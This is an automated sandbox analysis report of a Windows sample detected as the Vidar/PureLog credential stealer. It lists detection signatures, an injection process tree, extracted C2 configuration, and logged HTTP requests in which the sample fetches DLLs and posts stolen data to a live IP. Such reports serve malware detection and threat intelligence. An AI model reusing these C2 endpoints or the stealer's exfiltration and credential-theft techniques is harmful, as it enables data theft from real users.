Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
Analysis ID:1429063
MD5:7f1e688e77760ad29c560404a2fb9d2f
SHA1:7c06e05c8e13d01df26653cbe12695af139c5854
SHA256:086bcb65380fa0e4d23c07fbff58863949f8158b87d07cd6eac6485d99b3bf0d
Tags:exe
Infos:

Detection

PureLog Stealer, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe (PID: 6308 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe" MD5: 7F1E688E77760AD29C560404A2FB9D2F)
    • MSBuild.exe (PID: 4076 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            00000000.00000002.1760730113.0000000005D30000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              Click to see the 12 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4d48a78.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.439ab30.4.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.439ab30.4.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    1.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4cf8a58.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                        Click to see the 14 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Silenttrinity Stager Msbuild Activity
                        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 23.76.43.59, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 4076, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731

                        Snort Signatures

                        No Snort rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Found malware configuration
                        Source: 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}
                        Multi AV Scanner detection for domain / URL
                        Source: https://37.27.87.155/1Virustotal: Detection: 7%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeReversingLabs: Detection: 23%
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeVirustotal: Detection: 26%Perma Link
                        Machine Learning detection for sample
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeJoe Sandbox ML: detected
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00406FD0 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00406FD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00409230 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcat,PK11_FreeSlot,lstrcat,1_2_00409230
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00411720 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_00411720
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00406F50 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00406F50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAC6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,1_2_6CAC6C80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC1A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,1_2_6CC1A9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC144C0 PK11_PubEncrypt,1_2_6CC144C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC14440 PK11_PrivDecrypt,1_2_6CC14440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,1_2_6CBE4420
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC625B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,1_2_6CC625B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBFE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,1_2_6CBFE6E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC1A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,1_2_6CC1A650
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBF8670 PK11_ExportEncryptedPrivKeyInfo,1_2_6CBF8670
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 23.76.43.59:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 37.27.87.155:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                        Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                        Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                        Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761810556.0000000005F50000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761810556.0000000005F50000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr
                        Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                        Source: Binary string: protobuf-net.pdb source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040B030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004011E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,DeleteFileA,FindNextFileA,FindClose,1_2_004164A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00417550
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040A530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00416CF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00417140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040A980
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,1_2_004168E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                        Networking

                        barindex
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199673019888
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 37.27.87.155 37.27.87.155
                        Source: Joe Sandbox ViewIP Address: 23.76.43.59 23.76.43.59
                        Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBKKKJJJKKEBGDAFIDUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 6237Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGIDUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDHCAAKECFIDHIEBAKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHJEHDBGHIDGDGHCBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 139465Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAFCAKEHDHDHIDHDGDHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
